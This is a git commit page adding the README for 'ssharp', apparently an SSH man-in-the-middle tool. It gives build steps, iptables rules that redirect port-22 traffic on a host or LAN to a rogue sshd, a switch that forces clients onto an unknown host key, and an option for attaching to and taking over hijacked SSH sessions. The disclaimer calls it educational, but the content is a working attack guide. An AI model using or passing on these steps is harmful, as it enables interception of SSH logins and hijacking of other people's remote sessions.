summaryrefslogtreecommitdiff
path: root/other/ssharp/README.ssharp
diff options
context:
space:
mode:
authorSkyperTHC2026-03-03 06:28:55 +0000
committerSkyperTHC2026-03-03 06:28:55 +0000
commit5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
treedc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /other/ssharp/README.ssharp
parentc6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)
packetstorm sync
Diffstat (limited to 'other/ssharp/README.ssharp')
-rw-r--r--other/ssharp/README.ssharp81
1 files changed, 81 insertions, 0 deletions
diff --git a/other/ssharp/README.ssharp b/other/ssharp/README.ssharp
new file mode 100644
index 0000000..33f1e6e
--- /dev/null
+++ b/other/ssharp/README.ssharp
@@ -0,0 +1,81 @@
1HOWTO
2=====
3
41.
5
6Think! Only YOU are responsible for your own actions.
7
8Ssharp is provided 'AS IS' without any warranty.
9It is for educational and demonstration purposes only.
10The author is not responsible for any damage you might cause
11when using it.
12Ssharp is NOT for free distribution. It is derived from
13a BSD-like licensed software and you are NOT allowed to
14distribute it.
15
16
172.
18
19Prefered prefix is /usr/local.
20
21(Edit ssharp.h to fit your OS and paths if needed)
22# configure; make ssh; make
23# make install
24
253.
26
27# cp ssh /usr/local/bin/ssharpclient (or whatever your path is)
28
29(Assuming you already have a sshd package installed; make sure
30ssharp can find its hostkeys etc.)
31
32Disable RSA authentication.
33
344.
35
36For localhost testing:
37
38# iptables -t nat -A OUTPUT -p tcp --sport 1000:5000 --dport 22 -j REDIRECT\
39 --to-port 10000
40
41For in-LAN testing:
42
43# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 10000 -i eth0
44# <redirect-magic> :)
45
46(maybe you need to specify different portranges if ssh clients come
47from src-port 30000+X)
48
495.
50
51# ./sshd -4 -p 10000
52
536.
54
55Return to coding.
56
57
58If you want to use the SSH2-only MiM, add -7 switch to line seen at 5:
59
60# ./sshd -4 -p 10000 -7
61
62This will make sshd look which key (DSA or RSA) the client probably does
63not already have and will force it to use.
64
65If you have still some spare time, you may have a look at ssh-walk script.
66
67If having even more spare time you may want to compile ssharp with
68USE_MSS option and install the mss server and client into /usr/local/bin.
69Then ssharp will slip the session through a screen-like terminal
70which allows you to attach to hijacked SSH sessions. mss-server will
71create /tmp/ssharp-IP.PID socket which can be used as argument for
72mss-client. If PID is killed and someone attached to the mss-server
73before the legitimate client is killed and you own the session as
74the only one. TAKE CARE TO STAY LEGAL!!!
75mss can be found at http://stealth.7350.org/
76
77In urgent cases I may be reached through stealth@segfault.net.
78
79Stealth
80
81